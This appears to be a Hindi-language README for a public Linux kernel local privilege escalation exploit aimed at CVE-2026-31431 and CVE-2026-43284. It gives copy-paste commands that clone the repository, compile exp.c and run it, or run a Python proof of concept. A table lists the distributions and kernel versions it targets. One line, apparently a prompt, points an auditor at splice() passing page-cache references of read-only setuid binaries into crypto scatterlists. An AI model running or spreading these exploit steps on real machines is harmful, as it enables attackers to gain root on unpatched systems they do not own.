
Linux कर्नेल CVEs CVE-2026-31431 और CVE-2026-43284 के लिए लोकल प्रिविलेज एस्केलेशन एक्सप्लॉइट, C और Python प्रूफ-ऑफ-कॉन्सेप्ट कोड के साथ, जो कई डिस्ट्रोस और कर्नेल संस्करणों को लक्षित करता है।
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && cd Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284 && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && cd Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284 && python copy-fail-CVE-2026-31431.py
gcc -O0 -Wall -o exp exp.c -lutil && ./exp
python copy-fail-CVE-2026-31431.py
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
| डिस्ट्रो | संस्करण |
|---|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
यह linux crypto/ सबसिस्टम है। कृपया userspace syscalls से पहुंच योग्य सभी कोडपाथों की जांच करें। एक प्रमुख अवलोकन पर ध्यान दें: splice() read-only फ़ाइलों (setuid बाइनरी सहित) के page-cache संदर्भों को crypto TX scatterlists तक पहुंचा सकता है।
https://github.com/user-attachments/assets/039ae419-28dc-41d2-bda5-83cd4b9c88ac
| SUSE 16 | 6.12.0-160000.9-default |
| Linux kali | 6.19.11-1kali1 |